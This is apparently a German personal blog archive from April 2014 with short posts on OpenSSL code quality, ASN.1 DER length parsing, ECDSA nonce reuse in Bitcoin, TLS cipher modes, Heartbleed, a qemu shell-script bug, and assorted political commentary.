Und man kennt das ja auch von Quacksalbern, was dann als nächstes kommt. "Das funktioniert nur, wenn du dran glaubst". Und in der Tat:
But the phenomenon is sufficiently well known in parapsychology that it has led to its own host of theories about how skeptics emit negative auras, or the enthusiasm of a proponent is a necessary kindling for psychic powers.
Ganz großes Kino! (Danke, Matthias)

Fri Apr 25 2014

[l] Es gab in den letzten 12 Monaten ein paar spektakuläre Untersuchungen von großen Mengen an Crypto-Schlüsseln, u.a. aus dem Internet gesammelt oder von von einem Land ausgeteilten Smartcards und so. Das war bisher für RSA, und da haben sich möglicherweise die Anhänger von elliptischen Kurven gedacht, bei ihnen sei das alles besser. Hier ist ein Paper, wo ein paar Forscher so etwas mal für elliptische Kurven gemacht haben, und zwar bei TLS, SSH, Bitcoin und bei österreichischen elektronischen Personalausweisen. Die Ergebnisse sind haarsträubend. Besonders bei Bitcoin. Da haben sie nämlich doppelte Nonces gefunden (eine Nonce ist eine Zahl, den man nur einmal benutzt), und darüber ließen sich die private keys rekonstruieren. Allerdings waren die Accounts schon leergeräumt. Und dann fanden sie einen Account, der von 10 dieser Accounts Geld gestohlen zu haben scheint, und zwar insgesamt 59 Bitcoins oder umgerechnet 12000 Dollar.

Wed Apr 23 2014

[l] Es gibt noch einen Grund, wieso ich bisher nicht OpenSSL auditiert habe. Selbstschutz. Ich habe vor ein paar Jahren die Policy eingeführt, dass ich keinen Code auditiere, den ich an einer Stelle einsetze, an der es keinen realistischen Ersatz gibt. Die Idee war, dass das eigentlich immer nur zu dem Ergebnis führen kann, dass ich sehe, was für eine furchtbare Codequalität das ist, und dann kann ich nicht mehr schlafen nachts.
Damit war nicht OpenSSL gemeint, sondern sowas wie X, perl, gcc. Aber OpenSSL fiel auch darunter, in dem Sinne, dass ich da eh noch andere Vorbehalte für einen Audit hatte. Und diese Policy hat dann dazu geführt, dass ich da auch nicht mal oberflächlich reingucken wollte.
Da ich angesichts aktueller Entwicklungen eh nicht gut schlafen kann mit OpenSSL gerade, habe ich mich entschieden, doch mal kurz einen Blick zu werfen.
Ich bin, gelinde gesagt, entsetzt. Schon die OpenBSD-LibreSSL-CVS-Checkin-Kommentare haben ja tief blicken lassen.
Es gibt so ein paar Kriterien, an denen ich bei C-Code meinen ersten Eindruck festmache. Das erste Kriterium ist, dass Längen und Offsets immer unsigned sein müssen, und vom Typ size_t. Früher hätte ich gesagt: unsigned long ist auch OK. Aber es gibt Plattformen, auf denen long 32-bit aber size_t 64-bit ist. 64-bit Windows z.B. Daher muss es size_t sein, nicht unsigned long. Und schon gar nicht long. Hier ist, was OpenSSL macht:
```
static int asn1_get_length(const unsigned char **pp, int *inf, long *rl, int max)
```
Hier fallen ja schonmal als erstes die intuitiven Variablennamen auf. Da weiß man doch sofort, was gemeint ist! Ich kläre mal auf: Diese Routine soll einen ASN.1 DER Längenwert parsen. Das Encoding davon ist: Wenn das erste Byte das höchste Bit gesetzt hat, dann sind die unteren 7 Bits die Länge in Bytes für die Länge, die dahinter in big endian folgt. Wenn das erste Byte das höchste Bit nicht gesetzt hat, dann sind die unteren 7 Bits der Wert. Weil X.509 DER benutzt, gibt es zusätzlich noch die Regel, dass alle Längen minimal encoded sein müssen. Beispiele:
```
05 - Wert 5
7f - Wert 127
81 01 - Ungültig, da nicht minimal encoded; wäre sonst 1
82 00 23 - Ungültig, da nicht minimal encoded; wäre sonst 35
82 12 34 - Wert 4660 (0x1234)
89 11 11 11 11 11 11 11 11 11 - Ungültig, da der 9-Byte-Wert nicht in einen Integer passt
0x80 - Sonderfall, "indefinite length".
```
Meinem aktuellen Verständnis nach kann indefinite length bei X.509 nicht vorkommen, und ich unterstütze den Fall in meinen ASN.1-Routinen im Moment auch nicht sondern liefere einen Fehlerwert zurück. OpenSSL supported das. Möglicherweise übersehe ich da was. Wo ich aber nichts übersehe: OpenSSL prüft an keiner Stelle, dass das Encoding minimal ist. Der Effekt ist, dass man das identische Zertifikat auf mehrere Arten kodieren kann, und damit möglicherweise Angriffsfläche auf Krypto-Verfahren schaffen kann. Überhaupt sind Unterschiede zwischen Parsern immer doof, Differentiale will man an solchen Stellen vermeiden. Das ist jetzt kein "OMG RUN FOR THE HILLS"-Moment, aber wenn man schon eine zentrale Library macht für sowas, dann doch um da penibel solche Sachen abzufangen, damit die Leute das nicht alle von Hand machen und vergessen.
Aber unabhängig davon. pp ist der Quell-Zeiger (das const ist ein gutes Zeichen, das wäre Kriterium 2 für das Erkennen von schlechtem Code gewesen). inf wird auf 1 gesetzt, wenn indefinite length encoding reinkommt. Ich finde, das hätte man direkt zurückweisen sollen. Indefinite length encoding funktioniert so, dass man am Anfang sagt, man weiß nicht, wie groß die Daten werden, die jetzt kommen, und dann schickt man halt so viele Daten wie halt kommen und dann zwei Null-Bytes. Ganz schlechte Idee, und habe ich in der Praxis auch noch nie im Einsatz beobachten können. Das ist ja gerade der Grund, wieso man ASN.1 DER einsetzt, damit man vorher weiß, wieviele Daten jetzt kommen werden. Und im Übrigen siehe oben zu den Parser-Differenzen. Das will man vermeiden.
Aber der eigentliche Punkt, auf den ich die ganze Zeit hinauswill: die Länge ist ein long. Das ist ein ganz schlechtes Zeichen. Die Routine versucht, das Schlimmste zu verhindern, indem sie als unsigned parsed und dann einen Fehler meldet, wenn der Wert größer als LONG_MAX ist. Und in der Tat, wenn sie das nicht gemacht hätte, hätte es im String-Parsing direkt einen schönen Buffer Overflow gegeben.
Ich habe jetzt jedenfalls ein schlechtes Gefühl bei OpenSSL und werde glaube ich erstmal die ASN.1-Routinen von PolarSSL auditieren, damit ich einen Fallback habe, wenn ich die ganzen Atommüllablagerungen in den Fracking-Schächten bei OpenSSL finde.
Update: Oh Graus, ich erfahre gerade, dass ich X.509 die ganze Zeit falsch verstanden hatte. Ich hatte das so verstanden, dass X.509 immer DER Encoding nimmt. Denn, mit Verlaub, alles andere ergibt auch gar keinen Sinn. Man will das ja in digitalen Signaturen verwenden. DER ist eine Teilmenge von BER, die genau den Zweck und die Daseinsberechtigung hat, dass man alles nur auf genau eine wohldefinierte Art kodieren kann. Begründung: Das braucht man so für digitale Signaturen. Und jetzt erfahre ich gerade, dass X.509 gar nicht DER sondern BER benutzt! Man soll das als Implementation anscheinend als BER parsen, dann soll man das als DER neu kodieren und dann die Signaturberechnungen machen!? Das kann ja wohl nicht wahr sein! Dann hätte OpenSSL Recht mit ihrem Code. Heilige Scheiße, wer denkt sich denn solche Standards aus!? In der Praxis habe ich noch nie was anderes als DER-Encoding gesehen. In meiner SSL-Library werde ich jedenfalls gleich beim parsen alles rejecten, das nicht DER ist.
Update: Interessanterweise macht OpenSSL es auch falsch, wenn BER Absicht ist.
```
173                         if (i > sizeof(long))
174                                 return 0;
```
~~Bei BER darf man auch sagen, der Integer hier hat 20 Bytes, und dann schickt man 19 0-Bytes und ein Byte mit dem Wert 23, und das wäre dann ein gültiger Integer.~~ Stimmt so auch nicht. Ach das ist ja ein erkenntnisreicher Tag heute. Früher musste man für die Standards Geld zahlen, inzwischen kann man sich die Spec von ASN.1 BER im Internet herunterladen. Und da steht dann in Sektion 8.1.3.5 Note2, dass der Sender bei den Längenbytes mehr Bytes als nötig schicken darf, aber beim Encoding des Wertes des Integers (8.3.2), dass man immer in der kleinsten möglichen Anzahl Bytes kodieren muss. Die müssen da unter dem Einfluss von Betäubungsmitteln gewesen sein, als sie das standardisiert haben.

Tue Apr 22 2014

[l] In letzter Zeit gab es in den USA einige Geschichten, bei denen mir echt die Haare zu Berge standen. Das Narrativ war jedesmal was mit Fracking. Wenn wir hier schon Ritzen in Schieferfelsen fracken, dann und das Öl oder Gas rausholen, dann können wir ja die entstehenden Hohlräume ja auch irgendwie füllen. Da waren schon Atomabfälle im Gespräch, wobei ich nicht weiß, wie ernst das gemeint war.
Aber es gab da einen fetten Chemieunfall in West Virginia, wo sie dann aus einem Fluss die Giftbrühe abpumpen mussten. Wohin jetzt mit dem Zeug? Ihr werdet es schon ahnen: Ab in die Fracking-Löcher in Ohio mit der giftigen Brühe von dem Chemieunfall neulich!
Injection wells are considered the safest—or, put another way, the least worst—method of disposing of hazardous waste we don't want to dump in rivers or on land. The toxins aren't supposed to seep through impermeable rock layers. But as a in-depth ProPublica investigation into injection wells has revealed, it happens—even with Class I wells that are the most tightly regulated.
At two other Class I wells in Ohio, for example, the deadly chemical phenol had risen 1,400 feet through rock, threatening aquifers.
Das deute ich mal so, dass die das schon länger machen, ihre Chemieabfälle so zu verklappen. Wer schonmal naturnahen Urlaub in den USA gemacht hat, dem wird bei so einer Meldung das Herz bluten.
Update: Ich erfahre gerade, dass auch die DDR das so gemacht hat. Siehe auch.
Update: Auch im Westen war das Gang und Gäbe.
[l] Wer TLS ein bisschen verfolgt in der letzten Zeit, der wird den Eindruck gekriegt haben, dass wir gerade alle entweder zu ECDSA oder zu RSA mit AES/GCM migrieren, als letzte verbleibende nicht offensichtlich gebrochene Cipher-Suites in TLS.
Ich persönlich halte DSA in allen Ausprägungen inzwischen für eine NSA-Hintertür und rate von der Verwendung ab. Der Grund ist, dass DSA so ausgelegt ist, dass man einen Zufallswert nimmt pro Operation mit dem geheimen Schlüssel, und wenn man zweimal den gleichen verwendet, dann fällt auf der anderen Seite der geheime Schlüssel aus einer vergleichsweise einfachen arithmetischen Umformung heraus. Das ist offensichtlich völlig unakzeptabel. Wie DSA überhaupt jemals soweit kommen konnte, dass es ein internationaler Standard wurde, erläutert djb in seinem Blog.
Kommen wir zu GCM. GCM ist der Galois Counter Mode. TLS hat einen Geburtsfehler, der seit vielen Jahren bekannt ist, und uns in letzter Zeit vermehrt auf den Fuß fällt. Nehmen wir mal an, Alice schickt Bob eine verschlüsselte Nachricht. Dann will man nicht nur, dass die Nachricht nicht von jemandem auf dem Weg gelesen werden kann, sondern auch, dass sie nicht verändert werden kann. Deshalb machen Protokolle wie TLS immer zwei Schritte: Verschlüsseln und eine Integritätssicherstellung. Dafür verwendet man sogenannte Message Authentication Codes, oder MAC. Dafür verwendet man häufig eine kryptographische Hash-Funktion mit einem beiden Seiten bekannten Geheimnis, aber man kann sowas auch anders konstruieren.
So, wenn man verschlüsseln will, verschlüsselt man dann erst und macht dann den MAC? Oder macht man erst den MAC und dann verschlüsselt man? Das war lange Jahre nicht so klar, ob das eine oder das andere besser ist. TLS macht erst MAC und verschlüsselt dann. Das hat über die Jahre zu einem Haufen an Bugs und Problemen geführt, so dass heute klar ist, dass man das besser anders herum machen sollte. Die IETF-Arbeitsgruppe zu TLS weiß das seit vielen Jahren, aber (u.a. durch Sandsack- und Betoniertätigkeiten der NSA) konnte sie sich noch nicht durchringen, da was zu tun. Das ist eine Schande für alle Beteiligten und sollte zu einem fetten Arschtritt für die NSA-Abgesandten führen — tat es aber bisher nicht.
Warum erzähle ich das alles? Weil jemand auf die Idee kam, "aus Performance-Gründen" Verschlüsselung und Authentication in einem zu machen, und zwar mit einem Verfahren namens Galois Counter Mode. Ein Mode ist eine Art, wie man einen Block Cipher wie AES aufruft. Das heißt Block Cipher, weil es nicht auf einem Bytestrom arbeitet, sondern auf Blöcken von Daten. Wenn die Daten keinen ganzen Block füllen, muss man am Ende mit sogenanntem "Padding" auffüllen. Da gab es schon Stress in TLS. Man kann jeden Block mit dem selben Schlüssel verschlüsseln ("ECB"), aber das ist eine ganz schlechte Idee. Wikipedia hat eine schöne Visualisierung anhand eines Pinguin-Bildes. Welchen Modus man benutzt ist also wichtig. ECB ist offensichtlich doof, daher haben wir halt alle immer CBC genommen. Das flog uns dann mit BEAST um die Ohren.
Übrig blieben Cipher-Suites auf Basis von RC4 (von dem wir inzwischen wissen, dass die NSA es in Echtzeit entschlüsseln kann) und GCM.
Warum ich das jetzt hier alles ausführe: GCM ist auch Scheiße. Das Paper dazu kommt von Niels Ferguson. Es sei noch angemerkt, dass man GCM in Software schon mal gleich so gut wie gar nicht ohne Timing-Probleme implementieren kann. Intel hat in ihren neueren CPUs Hardware-Support für GCM eingebaut, damit geht das dann. Aber fühlt sich damit jemand wohl?
Was können wir denn jetzt überhaupt noch tun? Wir können entweder warten, bis die TLS Working Group mal ihren Arsch hochkriegt und den offensichtlich notwendigen Schritt geht. Es gibt da Bemühungen, aber das kann sich noch um Jahre handeln. Die Situation ist gänzlich unakzeptabel.
Bleibt die Einsicht, dass uns gerade nur djb-Krypto überhaupt noch realistisch retten kann. djb hat als Konkurrenz zu ECDSA ein Verfahren namens ed25519 gemacht, das könnte den public key Teil abdecken. ed25519 wird u.a. in der neuesten Version von openssh unterstützt. Und als Ersatz für AES mit irgendwelchen grottigen Modi könnte man ChaCha20 einbauen. Das ist in Chrome schon eingebaut, aber hat es m.W. in noch keine einzige öffentlich verfügbare TLS-Library geschafft. Es ist alles zum Heulen.
Ich habe ja jahrelang nicht verstanden, wieso djb nie versucht hat, TLS zu fixen. Ich glaube, so langsam kann ich es nachvollziehen.
Update: CBC ist nicht an sich unsicher, sondern wie TLS 1.0 es angewendet hat. Ein Upgrade auf TLS 1.2 galt damals noch als unrealistisch, inzwischen ist es weitgehend vollzogen.

Fri Apr 18 2014

[l] TV-Empfehlung: Der Beckmann über die digitale Welt. Ist natürlich am Ende des Tages immer noch eine TV-Talkshow, aber für Talkshow-Verhältnisse durchaus empfehlenswert. Für mich überraschend wirkte keiner der Gäste uninformiert oder hat bloß Phrasen abgesondert.
Update: Ein paar Gedanken zu der Sendung. Gabriel hat für die SPD mehr Rückgrat gezeigt als ich mich je gesehen zu haben erinnern kann. Nicht nur hat er Google mit der Zerschlagung gedroht, er hat auch das Gesprächsangebot von Eric Schmidt öffentlich gemacht, anstatt es einfach anzunehmen, wie sonst üblich. Das empfand ich als massiven Stinkefinger in Richtung Google. Mein Eindruck ist, dass der Gabriel sich jetzt anhand von Google als Internet-Freiheits-Datenschutz-Politiker aufbauen möchte.
Mein anderer Gedanke ist, dass der Alibi-Internet-Unternehmer erstaunlich eloquent und als helles Köpfchen rüberkam. Das ist mal ein deutlicher Unterschied zum üblichen Talkshow-Einerlei, wo man da einen stammelnden "Betroffenen" hat, der nur da sitzt, um den Leuten einen Betroffenen zeigen zu können. Mir fiel auf, dass der darauf hinwies, dass er ja stark zwischen geschäftlich und privat trennt. Das ist ein Wink mit dem Zaunpfahl, dessen Signifikanz anscheinend in der Runde keiner so direkt aufgefangen hat. Es heißt, dass der Mann selber damit unzufrieden ist, dass er Daten sammeln muss. Er weiß, dass die Kunden das nicht wollen, dass das unmoralisch ist, und dass er da was verwerfliches tut. Er tut es, weil er glaubt, sonst nicht konkurrenzfähig zu sein. Die wichtige Lektion dabei ist: Von ihm und seinen Kollegen ist keine Gegenwehr zu erwarten bei Regulierungsversuchen. Nur so Token-Gegenwehr, um die Investoren zu beruhigen. Eigentlich hätte keiner von denen ein Problem damit, mit dem Profiling aufzuhören, wenn das ab morgen verboten wäre. Die einzigen, die da echt gegen opponieren würden, sind Unternehmen, die sich als supranational sehen, wie Google. Unternehmen, die mit dem Profiling andere, etablierte Unternehmen gerade aus dem Markt schmeißen.
Google hätte aus meiner Sicht in ein paar Jahren auch kein Problem mehr, auf das Profiling zu verzichten, wenn sie den Markt von Werbung, Tracking und Versicherungen komplett übernommen haben. Die Märkte, in denen ihre Profiling-Kompetenz ihnen Vorteile verschafft. Aber bis dahin brauchen sie das noch.
Update: Einen Gedanken noch. Juli Zeh spricht in der Sendung an, dass wir in Europa bald die Wahl haben zwischen Martin Schulz und Jean-Claude Juncker, und dass bitte alle entsprechend ihr Kreuzchen machen sollten. Ich hätte nicht gedacht, dass ich jemals nochmal etwas Positives über Sozialdemokraten sagen würde, aber Martin Schulz ist so dermaßen offensichtlich die bessere Wahl, dass ich an der Stelle empfehlen würde, auch im Bekanntenkreis ein bisschen Druck auszuüben. Wir sind alle aufgerufen, die Konservativen zu marginalisieren. Bei denen ist klar, dass wir eine neue Vorratsdatenspeicherung kriegen.

Thu Apr 17 2014

[l] Aktuelles Highlight aus dem OpenSSL-Cleanup von OpenBSD:
```
Do not feed RSA private key information to the random subsystem as
entropy.  It might be fed to a pluggable random subsystem….What were they thinking?!
```
Äh ja, die Frage stellt sich. Ich stelle mir das ungefähr so vor:
Hey, Cheffe, wir brauchen hier mal Entropie für den Zufallszahlengenerator!
Was sagst du? Krypto-Schlüssel haben eine hohe Entropie?
OK, Cheffe, knorke, wird gemacht!
m(

Wed Apr 16 2014

[l] Liebe Leser, liebe Hörer, es ist mir ein besonderes Vergnügen, nach langer Dürre heute Alternativlos 31 über Internet-Diskurs am Beispiel von Trollen, Mimimis, der Empöreria und andere Webforen-Insassen veröffentlichen zu können. Wir haben als Gast den bekannten Trollologen Linus Neumann im Studio gehabt, und der hat uns auch eine Kommentarsite extra für diese Sendung gebaut, von der wir annehmen, dass sie alle erwähnten Muster demnächst live vorführen wird.
Triggerwarnung: Fefes Lache, schwierige Themen, Holocaust-Vergleiche und Homophobie.
Wir hatten ein neues, mobileres Aufnahmegerät am Start dieses Mal, was zu erheblichen Lautstärkeschwankungen geführt hat, die der Kompressor ausgleichen musste. Teilweise hört man das raus, ich bitte das zu entschuldigen. Die Sendung ist mit über drei Stunden sehr lang geworden; wir haben zweimal Pause gemacht, die Stellen erkennt ihr an den Senderwechselgeräuschen, die unser Audiofachmann Gerd Eist da reingeschnitten hat.
Update: Man kann jetzt übrigens auch per https auf alternativlos.org zugreifen. Der Zugriff auf die Audiodatei im CDN ist aber immer noch unverschlüsselt, insofern hilft das nur begrenzt weiter. Aber einige von euch hatten sich das gewünscht.
[l] Mir reicht es. Webseiten, bei denen man beim Runterscrollen nicht das ganze Browserfenster für den Inhalt hat, sondern die oben einen fixen Streifen Navigations-Bullshit abzwacken, am besten noch mit dem überall identischen Javascript-Übergang, die boykottiere ich ab jetzt.
Das ist ja schlimm genug, wenn die Webseiten alle am Rand irgendwelchen Bullshit einblenden. Wir haben daraufhin alle unsere Fenster breiter gemacht und setzen jetzt Breitbild-Monitore ein, damit wir trotzdem noch genug Text vor den Augen haben. Eine absolute Zumutung!
Und jetzt fehlt auch noch oben 20%? Weil irgendein Designer keinen Hydranten gefunden hat und dann halt auf die Webseite pinkeln musste?
Nicht mit mir. Hoffentlich wird das bald Adblock-Feature, diesen Mist transparent wegzufiltern. Zum Kotzen!
[l] Döpfner (Axel-Springer-Chef) schreibt in der FAZ einen lesenswerten offenen Brief an Google. Quintessenz:
Wir haben Angst vor Google. Ich muss das einmal so klar und ehrlich sagen, denn es traut sich kaum einer meiner Kollegen, dies öffentlich zu tun. Und als Größter unter den Kleinen müssen wir vielleicht auch in dieser Debatte als Erste Klartext reden.
Ich möchte mal einen Absatz herausgreifen, um zu unterstreichen, dass ihr das lesen sollt:
Die Verlage haben hier früh – als Vorboten für andere Branchen und Industrien – ihre Erfahrungen gemacht. Aber solange es nur um die Enteignung von Inhalten (die Suchmaschinen und Aggregatoren nutzen, aber nicht bezahlen wollen) ging, haben sich nur wenige dafür interessiert. Aber das ändert sich, wenn das Gleiche mit den persönlichen Daten der Menschen geschieht. Die Frage, wem diese Daten gehören, wird eine der politischen Hauptfragen der Zukunft sein.
Das ist doch mal eine großartige Argumentation! Da wäre ich nicht drauf gekommen.

Mon Apr 14 2014

[l] Mir mailte am Wochenende jemand, dass T-Systems bei DLR die IT-Hardware und Security macht (oder zumindest bis vor kurzem gemacht hat).
Welches DLR? Das DLR hier. Man kann sehen, dass sie involviert sind, wenn man bei whois.ripe.net nach as28 fragt.

Sat Apr 12 2014

[l] Ist das eigentlich zuviel verlangt, wenn ich erwartet habe, dass der Heartbleed-Typ sich für seinen Fehler bei der Welt entschuldigt? Ein paar Worte des Bedauerns äußert?
Aber da war ja überhaupt keine Reue, nicht mal ein "Hups". Eher so Beobachten aus der Entfernung. "Hmm, das hat aber groß Bumms gemacht".
Mal einen Fehler zu machen, dass kann man verzeihen. Passiert. Aber nicht zu seinen Fehlern zu stehen, und in der Presse das dann noch kleinzureden versuchen, "war nur ein ganz trivialer Fehler", das geht aus meiner Sicht gar nicht. Und das dann noch dem Briten in die Schuhe schieben zu wollen, der das am Neujahrsmorgen um 1 Uhr nachts durchgewunken hat, das finde ich auch unakzeptabel.
Das ist genau so abwegig wie wenn ein Krimineller für seine Tat die Polizei verantwortlich macht, weil die ihn nicht aufgehalten haben.
Im Übrigen: Nein, der Fehler ist nicht trivial. In einem Netzwerkprotokoll keine Eingabevalidierung zu machen ist kein trivialer Fehler. Das ist auf der 1-bis-Tschernobyl-Skala ein Fukushima. Das Mindeste, was man dann tun kann, ist ein öffentliches: Meine Schuld, tut mir leid, verzeiht mir, ich gelobe Besserung. Zumindest ein bisschen "Wir entschuldigen uns für die Unannehmlichkeiten"-Heucheln ist ja wohl nicht zuviel verlangt!
Wie sieht denn das jetzt aus? "Sind die Open-Source-Leute alle so wenig teamfähig, dass sie ihre Fehler kleinreden und anderen in die Schuhe schieben?" "Vielleicht lassen wir das hier lieber nicht in Deutschland entwickeln, die stehen da nicht zu ihren Fehlern."
Aber vielleicht habe ich da einfach zu hohe Ansprüche. Ich runzle ja schon meine Stirn, dass jemand mit so wenig Erfahrung es überhaupt gewagt hat, bei OpenSSL Code einzuchecken, der auch noch Daten vom Angreifer handled. Das ist dann wohl der Dunning-Kruger-Effekt in Aktion.
Ich habe 1995 mal Code bei ssh eingeschickt, bevor es openssh gab. Das war Code für ein zusätzliches Detail in der Config-Datei. Ich weiß noch, wie ich da sehr nervös war, das überhaupt hinzuschicken. Netzwerk-Parsing-Code hätte ich mich gar nicht einzusenden getraut damals. Ist dieser Respekt vor wichtigen Infrastrukturprojekten über die Jahre verloren gegangen?
Oder habe ich das übersehen und er hat sich entschuldigt?
Update: Eigentlich ist der Typ bloß das Symptom. Das ist ja ein gesamtgesellschaftliches Problem. Oder erinnert sich jemand von euch, wann in der Politik zuletzt jemand Schuld gewesen ist an irgendwas? Kommt nicht mehr vor. Der Hoeneß war Schuld, ja, als es nicht mehr zu leugnen war. Das war die Ausnahme. War bei dem Mollath irgendjemand Schuld? Nein. Bei BER? Das war alles Schicksal. Ein Gesetz nach dem anderen haben wir wegen Verfassungswidrigkeit weggehauen. Da war auch nie jemand Schuld. Illegaler Bundestrojanereinsatz? War auch keiner Schuld. Kaufen wir halt einen anderen Trojaner. Vorratsdatenspeicherung verfassungswidrig? Niemand zeugt Reue. Ich hatte halt gehofft, dass das wenigstens in meiner Branche anders ist. Dass wenigstens die Techies zu ihrem Scheiß stehen können. Techies sind ja auch sonst ehrlicher und können den Kunden im Allgemeinen nicht so direkt ins Gesicht lügen, wenn sie nach Schwächen ihres Produkts gefragt werden.
Apropos Fukushima. TEPCO hat sich entschuldigt. Die hätten auch mit dem Finger einmal im Kreis zeigen können. Die Regulierungsbehörde, die Regierung, die Anreize, die Börse, wir haben unseren Techies vertraut, das lief doch immer alles super… aber selbst DIE haben die Größe gehabt, sich zu entschuldigen.
[l] Habt ihr euch auch schon immer mal gefragt, wo eigentlich dieser irische Datenschutzbeauftragte sitzt, der Facebook und co mit ihrem Bullshit durchkommen lässt? Na gehen wir doch mal gucken! Die Homepage sagt: Canal House, Station Road, Portarlington, Co. Laois, Ireland. Geht da mal auf Streetview! Oder klickt bei Netzpolitik.org, die zuerst die Idee hatten, und diesen Screenshot gemacht haben.
Update: Wenn man einmal um die Ecke läuft, sieht man den Eingang.
[l] Griechenland zahlt dann mit den neu aufgenommenen Schulden erstmal die Spekulanten aus. Ihr wisst schon, die Spekulanten, die bei dem Haircut nicht mitgemacht haben. Was für ein Schneeballsystem.
Oh und wer hat eigentlich die Anleihe organisiert?
Die Emission der Anleihe wird von der Bank of America Merrill Lynch, der Deutschen Bank, Goldman Sachs, HSBC, JP Morgan und Morgan Stanley organisiert.
Na dann ist ja alles in trockenen Tüchern!
Update: Hups, die Meldung ist von 2012. Aber macht euch mal nichts vor, mit den neuen Schulden werden die auch heute erstmal ihre Gläubiger befriedigen. Die, die ihnen die Schulden nicht erlassen hatten. AKA: Die Spekulanten. (Danke, Christian)
[l] Mehdorn hat einen Autounfall auf dem Heimweg von einer BER-Sitzung. Ich nahm an, in ein paar Jahren geben sie zu, dass BER abgerissen und neu gemacht werden muss, und dann geht ihr bis dahin wohlbezahlter Krisen-Blitzableiter Mehdorn spektakulär in den Ruhestand und alles wird gut. Ob es da noch krassere Probleme gibt als sich bisher angedeutet haben? Einen Autounfall finde ich aber jetzt doch zu hart. Immerhin blieb er unverletzt.
Update: Was wohl als nächstes passiert? Wenn man ihm eine Reederei zum in den Boden rammen übergibt, hat er alle Verkehrsmittel durch.

Fri Apr 11 2014

[l] Bloomberg behauptet, die NSA habe Heartbleed schon seit Jahren exploited. Die Quellenlage scheint mehr als dünn zu sein, und ich halte das auch für eher unwahrscheinlich, weil selbst heute bei weitem noch nicht alle auf OpenSSL 1.0.1 umgestellt haben. Der Bug ist überhaupt erst seit OpenSSL 1.0.1 dabei. Vor zwei Jahren hätte das ein paar Nerds betroffen, niemanden relevanten. Vor zwei Jahren einen Exploit gehabt haben, das mag sein.
Aber die Kernbotschaft, egal ab wann Geheimdienste das exploited haben, ist: Geheimdienste arbeiten gegen ihre eigene Bevölkerung, nicht für sie. Die Geheimdienste wussten davon und haben nichts gesagt.
Oh und eine Sache noch: Das sieht jetzt hier aus wie eine Bankrotterklärung von Open Source. Das stimmt nicht. Der Bug wurde von zwei Leuten gleichzeitig gefunden und gemeldet. Einmal von einer Security-Firma, die eine Testsuite für SSL-Bugs programmiert hat. Die hätte das auch bei einem Nicht-Open-Source-SSL gefunden. Aber der andere Finder war ein Google-Angestellter, der einen Quellcode-Audit gemacht hat. Den hätte es so bei einem Nicht-Open-Source-SSL nicht gegeben. Wir haben hier also die Chancen direkt verdoppelt, solche Bugs zu finden. Wer weiß, was in Kommerzsoftware noch so für Untiefen lauern.
Meiner Erfahrung nach variiert die Codequalität bei Open Source und bei kommerzieller Software immens, und der Durchschnitt liegt ungefähr auf einem vergleichbaren Niveau. Man kann nicht davon ausgehen, dass kommerzielle Software grundsätzlich ein höheres Niveau hat.
Übrigens stört mich an der Debatte ein bisschen, dass so wenig Leute daraus Konsequenzen ziehen. Wir benutzen alle die ganze Zeit Open Source Software, ohne dafür zu zahlen, und wir benutzen Kommerzsoftware und bezahlen dafür. Dann wundern wir uns, dass die Hersteller von Kommerzsoftware Geld haben, um davon Audits machen zu lassen, aber die Open Source-Leute warten müssen, bis Google mal vorbeikommt.
Eine mögliche Konsequenz aus dem aktuellen Geschehen könnte sein, dass man mal einen Fonds macht, in den Benutzer von Open Source-Software einzahlen, und mit dem dann Qualitätssicherungsmaßnahmen bezahlt werden, für die Freiwillige bei den jeweiligen Projekten nicht die Motivation aufbringen. Das meint natürlich Security-Audits, aber es meint auch sowas wie ordentliche Testsuiten basteln; Dokumentation bereitstellen.
Update: Die US-Regierung dementiert. Was sollen die auch sonst sagen. Sie behaupten sogar, dass sie alle Lücken reporten, die sie finden. Ja nee, klar.
[l] Weil offenbar bisher immer noch einige nicht verstanden haben, was mein Punkt war, als ich sagte, der Code sieht wie eine Backdoor aus: Ihr solltet euch alle schämen. Kann hier gar keiner mehr selbständig denken?
Leute, es ist doch völlig wurscht, ob das jetzt eine Backdoor ist oder nicht. Wir müssen alle davon ausgehen, dass über dieses Ding alle unsere Passwörter rausgetragen wurden. Ob das jetzt ein Geheimdienst eingebaut hat, oder ob das ein Geheimdienst nur entdeckt und damit sein BULLRUN-Programm aufgebohrt hat, das ist doch völlig nebensächlich.
Der Punkt an der Sache ist, dass wir ab jetzt IMMER davon ausgehen müssen, dass irgendwelche Bugs auch eine Backdoor sein könnten. Es gibt für sowas keine Beweise, nur Indizien, und wir wissen es nie genau, bis es irgendwann ein Whistleblower zugibt. Und es spielt auch keine Rolle, wie viele Indizien es gibt, wie stark die sind, oder ob es wirklich eine Backdoor war oder nicht.
Es geht auch nicht um diesen Seggelmann. Der wird jetzt damit leben müssen, beim größten Security-Meltdown in der Geschichte von SSL der Mann an der Reaktorkühlung gewesen zu sein. Ob das jetzt Absicht war oder nicht — who cares.
Was eine Rolle spielt, ist dass wir jetzt das Bedrohungsszenario "jemand will uns eine Backdoor unterschieben, die bloß wie ein blöder Bug aussieht" nicht mehr als Verschwörungstheorie zu den Akten legen können nach Snowden. Wir müssen ab jetzt bei jedem Checkin davon ausgehen, dass uns jemand sabotieren will. Nicht bei allen Projekten. Aber bei sowas wie OpenSSL ganz bestimmt.
Open Source-Softwareentwicklung hat gerade den Sprung in die Geheimdienstwelt gemacht, wo man sich gegenseitig nicht mehr einfach so traut. Die Zeit der Blümchenwiesen-Softwareentwicklung ist vorbei, wenn die Software auf Millionen von Desktops läuft.
Ob das Open Source Modell in so einer Paranoia-Umgebung überleben kann, wird sich zeigen müssen. Aber einfach so tun, als beträfe uns das alles nicht, das können wir nicht mehr.
Ich bin mir übrigens sicher, dass man auch bei einigen von meinen Bugs über die Jahre rückblickend Indizien konstruieren könnte, wieso das wie eine Backdoor aussieht, oder einer anderen Backdoor hilft oder sie ermöglicht. Man müsste sich dafür recht weit aus dem Fenster lehnen, aber das ist ja kein Problem bei Verschwörungstheorien. Glücklicherweise habe ich nicht so viele sicherheitskritische Fehler gemacht über die Jahre.

Wed Apr 9 2014

[l] Bug des Tages: Ich wollte vorhin mal qemu updaten, aber das make begibt sich in eine Endlos-Rekursion in einem Shellskript. Wie sich rausstellte, war es scripts/make_device_config.sh. Hier ist der schuldige Teil:
```
process_includes () {
  cat $1 | grep '^include' | \
  while read include file ; do
    all_includes="$all_includes $src_dir/$file"
    process_includes $src_dir/$file
  done
}
```
Wie sich herausstellt, kann man das Problem auf eine Zeile eindampfen:
```
cat bin | grep include | while read include file; do echo $file; done
```
